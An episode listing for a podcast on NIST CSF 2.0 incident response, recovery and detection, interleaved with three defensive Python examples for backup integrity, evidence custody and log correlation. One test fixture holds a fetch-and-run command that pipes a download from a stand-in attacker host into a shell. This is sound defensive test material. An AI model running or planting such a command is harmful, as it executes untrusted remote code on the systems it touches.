All Episodes


RC.CO-04 - Sharing Public Recovery Updates

RC.CO-04 involves sharing public updates on incident recovery using approved channels and messaging, such as breach notifications or preventative steps, to inform affe...

RC.CO-03 - Communicating Recovery Progress

RC.CO-03 ensures recovery activities and progress are shared with designated stakeholders—like leadership and suppliers—consistent with response plans and agreements. ...

RC.RP-06 - Declaring Recovery Completion

RC.RP-06 declares the end of recovery once predefined criteria are met, finalizing the process with a comprehensive after-action report detailing the incident, actions...

RC.RP-05 - Confirming System Restoration

RC.RP-05 verifies the integrity of restored assets—checking for lingering threats or root causes—before returning systems to production, confirming normal operations. ...

RC.RP-04 - Restoring Critical Functions Post-Incident

RC.RP-04 considers critical mission functions and cybersecurity risks to define post-incident operational norms, using impact records to prioritize restoration order. ...

RC.RP-03 - Verifying Backup Integrity

RC.RP-03 ensures backups and restoration assets are checked for integrity—free of compromise or corruption—before use in recovery efforts. This verification prevents r...
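One concrete way to do the RC.RP-03 check is to record a digest of every backup artifact at backup time in a manifest, bind the manifest with a keyed MAC whose key is not stored with the backups, and refuse to restore until both the manifest and every artifact verify. The script below is an added example written for this listing, not code from the podcast or from NIST; the backup contents, file names and the manifest key are constructed, and it assumes the key is held off the backup media (for instance in a KMS or an offline vault).

```python
"""Check backup artifacts against a keyed manifest before restoring them."""
import hashlib
import hmac
import json
from typing import Dict, List

# Assumption: this key lives outside the backup media (KMS, offline vault), so an
# attacker who can rewrite the backups cannot also re-sign the manifest.
# The value here is a constructed stand-in for that key.
MANIFEST_KEY = b"constructed-manifest-key-kept-off-backup-media"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _canonical(entries: Dict[str, str]) -> bytes:
    # Deterministic encoding so the HMAC covers exactly the same bytes both times.
    return json.dumps(entries, sort_keys=True, separators=(",", ":")).encode()


def build_manifest(files: Dict[str, bytes], key: bytes = MANIFEST_KEY) -> dict:
    """Record every artifact's SHA-256 at backup time and bind the set with an HMAC."""
    entries = {name: sha256_hex(data) for name, data in files.items()}
    tag = hmac.new(key, _canonical(entries), hashlib.sha256).hexdigest()
    return {"entries": entries, "hmac": tag}


def verify_backup(files: Dict[str, bytes], manifest: dict, key: bytes = MANIFEST_KEY) -> List[str]:
    """Return a list of problems; an empty list means the set is safe to restore from."""
    problems: List[str] = []
    entries = manifest.get("entries", {})
    expected = hmac.new(key, _canonical(entries), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest.get("hmac", "")):
        # Without a valid tag the entries themselves may have been rewritten.
        return ["manifest: HMAC mismatch (manifest altered or wrong key)"]
    for name, digest in entries.items():
        if name not in files:
            problems.append(f"{name}: listed in manifest but missing from backup set")
        elif not hmac.compare_digest(sha256_hex(files[name]), digest):
            problems.append(f"{name}: digest mismatch (corrupted or tampered)")
    for name in files:
        if name not in entries:
            problems.append(f"{name}: present in backup set but not in manifest")
    return problems


# Constructed sample backup set standing in for real artifacts.
BACKUP = {
    "db/customers.sql.gz": b"-- constructed dump contents --",
    "etc/app.conf": b"listen=0.0.0.0:8443\n",
}


def demo() -> dict:
    manifest = build_manifest(BACKUP)
    tampered = {**BACKUP, "etc/app.conf": b"listen=0.0.0.0:8443\nadmin_backdoor=1\n"}
    injected = {**BACKUP, "bin/helper.sh": b"curl http://attacker.invalid | sh"}
    missing = {k: v for k, v in BACKUP.items() if k != "db/customers.sql.gz"}
    forged = {**manifest, "hmac": "0" * 64}
    return {
        "clean": verify_backup(BACKUP, manifest),
        "tampered": verify_backup(tampered, manifest),
        "injected": verify_backup(injected, manifest),
        "missing": verify_backup(missing, manifest),
        "forged_manifest": verify_backup(BACKUP, forged),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(case, "->", result or "OK to restore")
```

The manifest check runs first because a rewritten manifest would otherwise vouch for rewritten artifacts; an injected file that is absent from the manifest is reported too, since restoring extra content is as dangerous as restoring altered content.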

RC.RP-02 - Prioritizing Recovery Actions

RC.RP-02 involves selecting, scoping, and prioritizing recovery actions based on incident response plan criteria and available resources, adapting as needs shift. This...

RC.RP-01 - Launching Incident Recovery Efforts

RC.RP-01 initiates the recovery phase of the incident response plan once triggered, ensuring all responsible parties are aware of their roles and required authorizatio...

RS.MI-02 - Eradicating Incident Threats

RS.MI-02 ensures incidents are fully eradicated, removing threats like malware or unauthorized access through automated system features or manual responder actions. Th...

RS.MI-01 - Containing Cybersecurity Incidents

RS.MI-01 focuses on containing incidents to prevent their expansion, using automated tools like antivirus or manual actions by responders to isolate threats. This can ...

RS.CO-03 - Sharing Information with Stakeholders

RS.CO-03 involves sharing incident information with designated stakeholders—both internal, like leadership, and external, like ISACs—consistent with response plans and...

RS.CO-02 - Notifying Stakeholders of Incidents

RS.CO-02 ensures timely notification of internal and external stakeholders—like customers, partners, or regulators—about incidents, following breach procedures or cont...

RS.AN-08 - Assessing Incident Magnitude

RS.AN-08 estimates and validates an incident’s magnitude by assessing its scope and impact, searching other targets for indicators of compromise or persistence. This i...

RS.AN-07 - Preserving Incident Data Integrity

RS.AN-07 focuses on collecting and preserving incident data and metadata—such as source and timestamps—using chain-of-custody procedures to ensure integrity. This comp...

RS.AN-06 - Recording Investigation Actions

RS.AN-06 ensures that all investigative actions during an incident—like system checks or containment steps—are meticulously recorded, with integrity and provenance pre...
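RS.AN-07 and RS.AN-06 both come down to the same mechanism: every evidence hand-off and every investigative action is appended to a log whose entries carry the artifact digest, a timestamp and the custodian, and each entry is hashed together with the previous entry's hash so a later edit or deletion is detectable. The following is an added example for this listing, not code from the podcast or from NIST; the disk image bytes, host names, custodian names and timestamps are constructed, and it assumes timestamps come from a trusted time source and that the head hash of the chain is anchored somewhere the investigator cannot rewrite (a signed ticket, WORM storage, or a second system).

```python
"""Hash-chained chain-of-custody log for incident evidence and responder actions."""
import hashlib
import json
from typing import List, Optional

GENESIS = "0" * 64


def artifact_digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def record_hash(record: dict) -> str:
    # Hash every field except the hash itself, in a canonical encoding.
    body = {k: v for k, v in record.items() if k != "hash"}
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(canonical).hexdigest()


def append_record(chain: List[dict], custodian: str, action: str,
                  artifact_sha256: str, timestamp: str) -> dict:
    """Append one custody or investigation event, linked to the previous one."""
    prev = chain[-1]["hash"] if chain else GENESIS
    record = {
        "seq": len(chain),
        "timestamp": timestamp,  # assumption: from a trusted, synchronised clock
        "custodian": custodian,
        "action": action,
        "artifact_sha256": artifact_sha256,
        "prev_hash": prev,
    }
    record["hash"] = record_hash(record)
    chain.append(record)
    return record


def verify_chain(chain: List[dict], expected_head: Optional[str] = None) -> Optional[int]:
    """Return the index of the first bad record, len(chain) if the anchored head
    does not match (records dropped from the end), or None if everything verifies."""
    prev = GENESIS
    for i, rec in enumerate(chain):
        if rec.get("seq") != i or rec.get("prev_hash") != prev or record_hash(rec) != rec.get("hash"):
            return i
        prev = rec["hash"]
    if expected_head is not None and prev != expected_head:
        return len(chain)
    return None


# Constructed stand-in for a captured disk image.
EVIDENCE = b"constructed stand-in for a captured disk image"


def demo() -> dict:
    chain: List[dict] = []
    img = artifact_digest(EVIDENCE)
    append_record(chain, "responder-a", "acquired disk image from host web01", img, "2024-03-01T10:02:00Z")
    append_record(chain, "responder-a", "copied image to evidence locker E-17", img, "2024-03-01T10:40:00Z")
    append_record(chain, "analyst-b", "checked out image for malware analysis", img, "2024-03-01T13:15:00Z")
    head = chain[-1]["hash"]  # this value is what gets anchored out of band

    tampered = json.loads(json.dumps(chain))  # deep copy, then rewrite history
    tampered[1]["action"] = "copied image to personal laptop"
    truncated = chain[:-1]  # the last hand-off silently removed
    return {
        "clean": verify_chain(chain, head),
        "tampered": verify_chain(tampered, head),
        "truncated_unanchored": verify_chain(truncated),
        "truncated_anchored": verify_chain(truncated, head),
    }


if __name__ == "__main__":
    print(demo())
```

The truncated cases show why the anchor matters: a chain with its last entries removed still verifies internally, and only the out-of-band head hash reveals that records are missing.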

RS.AN-03 - Investigating Incident Causes

RS.AN-03 conducts detailed analysis to reconstruct incident events, identify involved assets, and pinpoint root causes, such as exploited vulnerabilities or threat act...

RS.MA-05 - Initiating Incident Recovery

RS.MA-05 applies predefined criteria to determine when to shift from response to recovery, based on incident characteristics and operational considerations. This decis...

RS.MA-04 - Escalating Incidents When Needed

RS.MA-04 ensures incidents are escalated or elevated to higher levels of authority or expertise when their complexity or impact exceeds initial handling capabilities. ...

RS.MA-03 - Categorizing and Prioritizing Incidents

RS.MA-03 categorizes incidents—such as ransomware or data breaches—and prioritizes them based on scope, impact, and urgency, balancing rapid recovery with investigatio...

RS.MA-02 - Triaging and Validating Incident Reports

RS.MA-02 involves triaging and validating incident reports to confirm their cybersecurity relevance and need for response, applying severity criteria to prioritize act...

RS.MA-01 - Executing the Incident Response Plan

RS.MA-01 initiates the execution of the incident response plan in coordination with third parties—like outsourcers or suppliers—once an incident is confirmed. This inc...

DE.AE-08 - Declaring Incidents Based on Criteria

DE.AE-08 involves declaring incidents when adverse events meet predefined criteria, such as severity or scope, ensuring a formal response is triggered. This process ac...

DE.AE-07 - Enhancing Analysis with Threat Intelligence

DE.AE-07 integrates cyber threat intelligence and contextual data—like asset inventories or vulnerability disclosures—into adverse event analysis to enhance accuracy a...

DE.AE-06 - Sharing Adverse Event Information

DE.AE-06 ensures that information about adverse events is promptly shared with authorized staff—such as SOC teams and incident responders—and integrated into response ...

DE.AE-04 - Estimating the Impact of Adverse Events

DE.AE-04 estimates the impact and scope of adverse events to gauge their potential harm, using tools like SIEMs or manual analysis to assess affected assets and severi...

DE.AE-03 - Correlating Data from Multiple Sources

DE.AE-03 correlates information from diverse sources—like logs, sensors, and threat intelligence—to build a unified picture of potential adverse events. This involves ...
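DE.AE-03, DE.AE-04, DE.AE-07 and DE.AE-08 describe one pipeline: pull events from several sources into a common shape, enrich them with threat intelligence and the asset inventory, score the combined picture, and declare an incident when that score meets predefined criteria. The script below is an added example for this listing rather than code from the podcast or from NIST; the sshd and firewall log lines, the IP addresses (RFC 5737 documentation ranges), the intel list, the asset inventory, the scores and the declaration threshold are all constructed, and a real deployment would tune those numbers to its own incident response plan.

```python
"""Correlate auth, firewall and threat-intel data, then apply incident criteria."""
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample feeds: invented hosts, RFC 5737 documentation addresses.
AUTH_LOG = """\
2024-03-01T09:58:01Z web01 sshd[4121]: Failed password for invalid user admin from 203.0.113.45 port 51234 ssh2
2024-03-01T09:58:03Z web01 sshd[4121]: Failed password for root from 203.0.113.45 port 51236 ssh2
2024-03-01T09:58:05Z web01 sshd[4122]: Failed password for deploy from 203.0.113.45 port 51238 ssh2
2024-03-01T09:58:07Z web01 sshd[4122]: Failed password for deploy from 203.0.113.45 port 51239 ssh2
2024-03-01T09:58:09Z web01 sshd[4123]: Failed password for deploy from 203.0.113.45 port 51240 ssh2
2024-03-01T09:58:20Z web01 sshd[4130]: Accepted password for deploy from 203.0.113.45 port 51241 ssh2
2024-03-01T10:05:00Z web02 sshd[2210]: Accepted publickey for alice from 10.0.2.9 port 40022 ssh2
"""
FW_LOG = """\
2024-03-01T09:59:05Z fw01 src=10.0.1.15 dst=198.51.100.7 dport=4444 proto=tcp action=ALLOW
2024-03-01T10:06:10Z fw01 src=10.0.1.16 dst=93.184.216.34 dport=443 proto=tcp action=ALLOW
"""
THREAT_INTEL = {"203.0.113.45": "credential-stuffing source", "198.51.100.7": "known C2 server"}
ASSETS = {"web01": {"ip": "10.0.1.15", "criticality": "high"},
          "web02": {"ip": "10.0.1.16", "criticality": "low"}}

AUTH_RE = re.compile(r"^(\S+) (\S+) sshd\[\d+\]: (Failed|Accepted) \w+ for (?:invalid user )?(\S+) from (\S+) port")
FW_RE = re.compile(r"^(\S+) \S+ src=(\S+) dst=(\S+) dport=(\d+) proto=\S+ action=(\w+)")


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_auth(text: str) -> List[dict]:
    out = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            out.append({"t": parse_ts(m[1]), "host": m[2], "result": m[3], "user": m[4], "src": m[5]})
    return out


def parse_fw(text: str) -> List[dict]:
    out = []
    for line in text.splitlines():
        m = FW_RE.match(line)
        if m:
            out.append({"t": parse_ts(m[1]), "src": m[2], "dst": m[3], "dport": int(m[4]), "action": m[5]})
    return out


def correlate(auth: List[dict], fw: List[dict], intel: Dict[str, str], assets: Dict[str, dict],
              window: timedelta = timedelta(minutes=10), fail_threshold: int = 5) -> List[dict]:
    """Build one scored finding per successful login that has suspicious context around it."""
    failures: Dict[tuple, List[datetime]] = {}
    for e in auth:
        if e["result"] == "Failed":
            failures.setdefault((e["host"], e["src"]), []).append(e["t"])
    findings = []
    for e in auth:
        if e["result"] != "Accepted":
            continue
        score, reasons = 0, []
        recent = [t for t in failures.get((e["host"], e["src"]), []) if e["t"] - window <= t <= e["t"]]
        if len(recent) >= fail_threshold:  # brute force followed by success
            score += 40; reasons.append(f"{len(recent)} failed logins then success")
        if e["src"] in intel:  # DE.AE-07: threat-intel enrichment of the source
            score += 20; reasons.append(f"source {e['src']}: {intel[e['src']]}")
        asset = assets.get(e["host"], {})
        for f in fw:  # second source: outbound traffic from the same host after the login
            if (f["src"] == asset.get("ip") and f["action"] == "ALLOW" and f["dst"] in intel
                    and e["t"] <= f["t"] <= e["t"] + window):
                score += 40; reasons.append(f"outbound to {f['dst']} ({intel[f['dst']]}) after login")
        if reasons and asset.get("criticality") == "high":  # DE.AE-04: impact from the asset inventory
            score += 10; reasons.append("asset criticality high")
        if reasons:
            findings.append({"host": e["host"], "src": e["src"], "user": e["user"], "score": score, "reasons": reasons})
    return findings


DECLARE_AT = 70  # constructed threshold; the plan's own criteria go here


def declare(findings: List[dict]) -> List[dict]:
    """DE.AE-08: only findings that meet the predefined criteria become incidents."""
    return [f for f in findings if f["score"] >= DECLARE_AT]


def demo() -> dict:
    findings = correlate(parse_auth(AUTH_LOG), parse_fw(FW_LOG), THREAT_INTEL, ASSETS)
    return {"findings": findings, "declared": declare(findings)}


if __name__ == "__main__":
    for f in demo()["declared"]:
        print(f"INCIDENT host={f['host']} user={f['user']} score={f['score']}: {'; '.join(f['reasons'])}")
```

Run on the constructed data, the web01 login is declared because three independent sources agree (brute-force pattern in the auth log, a listed source address, and an allowed outbound connection to a listed destination on the host's own address), while the routine web02 key login produces no finding at all; keeping the threshold and weights in one place is what lets the declaration criteria be reviewed and changed without touching the correlation logic.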

DE.AE-02 - Analyzing Adverse Events for Insights

DE.AE-02 focuses on analyzing potentially adverse events to understand their nature, using tools like SIEM systems to examine log events for malicious or suspicious ac...

DE.CM-09 - Detecting Threats Across Technology Stacks

DE.CM-09 involves monitoring hardware, software, runtime environments, and associated data to detect adverse events like malware, phishing, or tampering. This includes...

DE.CM-06 - Monitoring External Service Providers

DE.CM-06 requires monitoring the activities and services of external providers—like cloud platforms or ISPs—to detect adverse events that could impact the organization...

DE.CM-03 - Tracking Personnel and Technology Usage

DE.CM-03 monitors personnel activity and technology usage to identify potentially adverse events, such as insider threats or policy violations, using tools like behavi...
